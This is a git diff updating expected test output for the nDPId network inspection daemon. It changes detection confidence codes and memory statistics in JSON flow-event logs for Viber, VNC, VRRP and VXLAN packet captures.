+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":451,"source":"viber.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1648968035683,"flow_last_seen":1648968035683,"flow_idle_time":7580000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1648968035683,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"44.192.202.74","src_port":42900,"dst_port":4244,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} 
+00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":451,"source":"viber.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1648954023554,"flow_last_seen":1648954024107,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":516,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1648968035683,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"52.0.252.2","src_port":41184,"dst_port":5242,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":451,"source":"viber.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1648952182644,"flow_last_seen":1648952183755,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3518,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1648968035683,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"52.0.252.145","src_port":48690,"dst_port":4244,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} +00564{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":451,"source":"viber.pcap","alias":"nDPId-test","packets-captured":451,"packets-processed":447,"total-skipped-flows":0,"total-l4-payload-len":126369,"total-not-detected-flows":0,"total-guessed-flows":4,"total-detected-flows":26,"total-detection-updates":19,"total-updates":0,"current-active-flows":0,"total-active-flows":29,"total-idle-flows":29,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":186,"global_ts_msec":1648968035683} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ 
packets captured/processed: 451/447 ~~ skipped flows.............: 0 @@ -190,9 +192,9 @@ ~~ total active/idle flows...: 29/29 ~~ total timeout flows.......: 3 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6006697 bytes -~~ total memory freed........: 6006697 bytes -~~ total allocations/frees...: 118722/118722 +~~ total memory allocated....: 6100793 bytes +~~ total memory freed........: 6100793 bytes +~~ total allocations/frees...: 121473/121473 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 2407 chars diff --git a/test/results/vnc.pcap.out b/test/results/vnc.pcap.out index 4cd795ebf..747980dc6 100644 --- a/test/results/vnc.pcap.out +++ b/test/results/vnc.pcap.out 
@@ -4,14 +4,14 @@ 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"vnc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1476111264364,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1476111264364,"pkt":"EP7tAkntxOodxQGGCABFAAA0Xs1AAHQGVCNf7TDQwKgCbumPGvTqxTBkAAAAAIACIADbnAAAAgQFrAEDAwIBAQQC"} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"vnc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1476111264364,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1476111264364,"pkt":"xOodxQGGEP7tAkntCABFAAA0fFNAAIAGAADAqAJuX+0w0Br06Y8QfmeF6sUwZYASIABT+gAAAgQFtAEDAwgBAQQC"} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"vnc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1476111264402,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1476111264402,"pkt":"EP7tAkntxOodxQGGCABFAAAoXs5AAHQGVC5f7TDQwKgCbumPGvTqxTBlEH5nhlAQQTqDEwAAAAAAAAAA"} -00881{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"vnc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1476111264364,"flow_last_seen":1476111264453,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1476111264453,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":59791,"dst_port":6900,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto 
on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} +00881{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"vnc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1476111264364,"flow_last_seen":1476111264453,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1476111264453,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":59791,"dst_port":6900,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"6":"DPI"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3544,"source":"vnc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1476111286462,"flow_last_seen":1476111286462,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1476111286462,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":51559,"dst_port":6900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3544,"source":"vnc.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1476111286462,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1476111286462,"pkt":"EP7tAkntxOodxQGGCABFAAA0be5AAHQGRQJf7TDQwKgCbslnGvTjPDftAAAAAIACIAD7xAAAAgQFrAEDAwIBAQQC"} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3545,"source":"vnc.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1476111286462,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1476111286462,"pkt":"xOodxQGGEP7tAkntCABFAAA0AmNAAIAGAADAqAJuX+0w0Br0yWdPW3mt4zw37oASIABT+gAAAgQFtAEDAwgBAQQC"} 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3546,"source":"vnc.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1476111286499,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1476111286499,"pkt":"EP7tAkntxOodxQGGCABFAAAobe9AAHQGRQ1f7TDQwKgCbslnGvTjPDfuT1t5rlAQQTpSNgAAAAAAAAAA"} -00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3548,"source":"vnc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1476111286462,"flow_last_seen":1476111286549,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1476111286549,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":51559,"dst_port":6900,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on 
Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} -00930{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4551,"source":"vnc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1008,"flow_first_seen":1476111286462,"flow_last_seen":1476111290613,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":17966,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1476111290613,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":51559,"dst_port":6900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} -00929{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4551,"source":"vnc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":3543,"flow_first_seen":1476111264364,"flow_last_seen":1476111280884,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":64300,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1476111290613,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":59791,"dst_port":6900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File 
Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} +00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3548,"source":"vnc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1476111286462,"flow_last_seen":1476111286549,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1476111286549,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":51559,"dst_port":6900,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"6":"DPI"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} +00930{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4551,"source":"vnc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1008,"flow_first_seen":1476111286462,"flow_last_seen":1476111290613,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":17966,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1476111290613,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":51559,"dst_port":6900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"6":"DPI"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} 
+00929{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4551,"source":"vnc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":3543,"flow_first_seen":1476111264364,"flow_last_seen":1476111280884,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":64300,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1476111290613,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":59791,"dst_port":6900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"6":"DPI"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} 00559{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":4551,"source":"vnc.pcap","alias":"nDPId-test","packets-captured":4551,"packets-processed":4551,"total-skipped-flows":0,"total-l4-payload-len":82266,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1476111290613} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 4551/4551 
@@ -21,9 +21,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6006598 bytes -~~ total memory freed........: 6006598 bytes -~~ total allocations/frees...: 122673/122673 +~~ total memory allocated....: 6140232 bytes +~~ total memory freed........: 6140232 bytes +~~ total allocations/frees...: 125435/125435 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 457 chars ~~ json string max len.......: 935 chars diff --git a/test/results/vrrp3.pcapng.out b/test/results/vrrp3.pcapng.out index 1f8f5ce8f..2be7fce17 100644 --- a/test/results/vrrp3.pcapng.out +++ b/test/results/vrrp3.pcapng.out 
@@ -2,14 +2,14 @@ 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"vrrp3.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1589370606456} 00534{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"vrrp3.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1589370606456,"flow_last_seen":1589370606456,"flow_idle_time":620000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1589370606456,"l3_proto":"ip6","src_ip":"fe80::2","dst_ip":"ff02::12","l4_proto":112,"flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"vrrp3.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1589370606456,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":34525,"pkt_l3_offset":18,"pkt_l4_offset":58,"pkt_len":82,"pkt_l4_len":24,"thread_ts_msec":1589370606456,"pkt":"MzMAAAASAABeAAIkgQAAJIbdbgAAAAAYcP\/+gAAAAAAAAAAAAAAAAAAC\/wIAAAAAAAAAAAAAAAAAEjEkZAED6DQb\/oAAAAAAAAAAAAAAAAA2Ng=="} 
-00593{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"vrrp3.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1589370606456,"flow_last_seen":1589370606456,"flow_idle_time":620000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1589370606456,"l3_proto":"ip6","src_ip":"fe80::2","dst_ip":"ff02::12","l4_proto":112,"ndpi": {"confidence": {"4":"DPI"},"proto":"VRRP","breed":"Acceptable","category":"Network"}} +00593{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"vrrp3.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1589370606456,"flow_last_seen":1589370606456,"flow_idle_time":620000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1589370606456,"l3_proto":"ip6","src_ip":"fe80::2","dst_ip":"ff02::12","l4_proto":112,"ndpi": {"confidence": {"6":"DPI"},"proto":"VRRP","breed":"Acceptable","category":"Network"}} 00534{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"vrrp3.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1589370606915,"flow_last_seen":1589370606915,"flow_idle_time":620000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1589370606915,"l3_proto":"ip6","src_ip":"fe80::1","dst_ip":"ff02::12","l4_proto":112,"flow_datalink":1,"flow_max_packets":3} 
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"vrrp3.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1589370606915,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":34525,"pkt_l3_offset":18,"pkt_l4_offset":58,"pkt_len":82,"pkt_l4_len":24,"thread_ts_msec":1589370606915,"pkt":"MzMAAAASAABeAAIkgQAAJIbdbgAAAAAYcP\/+gAAAAAAAAAAAAAAAAAAB\/wIAAAAAAAAAAAAAAAAAEjEkaQED6C8c\/oAAAAAAAAAAAAAAAAA2Ng=="} -00593{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"vrrp3.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1589370606915,"flow_last_seen":1589370606915,"flow_idle_time":620000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1589370606915,"l3_proto":"ip6","src_ip":"fe80::1","dst_ip":"ff02::12","l4_proto":112,"ndpi": {"confidence": {"4":"DPI"},"proto":"VRRP","breed":"Acceptable","category":"Network"}} +00593{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"vrrp3.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1589370606915,"flow_last_seen":1589370606915,"flow_idle_time":620000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1589370606915,"l3_proto":"ip6","src_ip":"fe80::1","dst_ip":"ff02::12","l4_proto":112,"ndpi": {"confidence": {"6":"DPI"},"proto":"VRRP","breed":"Acceptable","category":"Network"}} 
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"vrrp3.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1589370616409,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":34525,"pkt_l3_offset":18,"pkt_l4_offset":58,"pkt_len":82,"pkt_l4_len":24,"thread_ts_msec":1589370616409,"pkt":"MzMAAAASAABeAAIkgQAAJIbdbgAAAAAYcP\/+gAAAAAAAAAAAAAAAAAAB\/wIAAAAAAAAAAAAAAAAAEjEkaQED6C8c\/oAAAAAAAAAAAAAAAAA2Ng=="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"vrrp3.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1589370625308,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":34525,"pkt_l3_offset":18,"pkt_l4_offset":58,"pkt_len":82,"pkt_l4_len":24,"thread_ts_msec":1589370625308,"pkt":"MzMAAAASAABeAAIkgQAAJIbdbgAAAAAYcP\/+gAAAAAAAAAAAAAAAAAAB\/wIAAAAAAAAAAAAAAAAAEjEkaQED6C8c\/oAAAAAAAAAAAAAAAAA2Ng=="} -00634{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"vrrp3.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1589370606915,"flow_last_seen":1589370680701,"flow_idle_time":620000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1589370680701,"l3_proto":"ip6","src_ip":"fe80::1","dst_ip":"ff02::12","l4_proto":112,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"VRRP","breed":"Acceptable","category":"Network"}} 
-00633{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"vrrp3.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1589370606456,"flow_last_seen":1589370606456,"flow_idle_time":620000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1589370680701,"l3_proto":"ip6","src_ip":"fe80::2","dst_ip":"ff02::12","l4_proto":112,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"VRRP","breed":"Acceptable","category":"Network"}} +00634{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"vrrp3.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1589370606915,"flow_last_seen":1589370680701,"flow_idle_time":620000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1589370680701,"l3_proto":"ip6","src_ip":"fe80::1","dst_ip":"ff02::12","l4_proto":112,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"VRRP","breed":"Acceptable","category":"Network"}} +00633{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"vrrp3.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1589370606456,"flow_last_seen":1589370606456,"flow_idle_time":620000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1589370680701,"l3_proto":"ip6","src_ip":"fe80::2","dst_ip":"ff02::12","l4_proto":112,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"VRRP","breed":"Acceptable","category":"Network"}} 
00555{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":10,"source":"vrrp3.pcapng","alias":"nDPId-test","packets-captured":10,"packets-processed":10,"total-skipped-flows":0,"total-l4-payload-len":240,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":13,"global_ts_msec":1589370680701} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 10/10 @@ -19,9 +19,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5870737 bytes -~~ total memory freed........: 5870737 bytes -~~ total allocations/frees...: 118126/118126 +~~ total memory allocated....: 6004371 bytes +~~ total memory freed........: 6004371 bytes +~~ total allocations/frees...: 120888/120888 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 463 chars ~~ json string max len.......: 639 chars diff --git a/test/results/vxlan.pcap.out b/test/results/vxlan.pcap.out index 4a2c972de..f48417d97 100644 --- a/test/results/vxlan.pcap.out +++ b/test/results/vxlan.pcap.out 
@@ -2,54 +2,54 @@ 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"vxlan.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1639650442645} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442645,"flow_last_seen":1639650442645,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1639650442645,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":60887,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1639650442645,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":126,"pkt_l4_len":88,"thread_ts_msec":1639650442645,"pkt":"AAy9Bjp0AAy9Bjp1gQAABQgARQAAbAM\/AABAEcnowKgWBMCoFgXt1xK1AFhqBAgAAAAABFcAZnpQqv+aHuppKm\/PCABFAAA6NbBAAEAR1uUKChQECAgICK2VADUAJhfikMYBAAABAAAAAAAACGZhY2Vib29rA2NvbQAAAQAB"} 
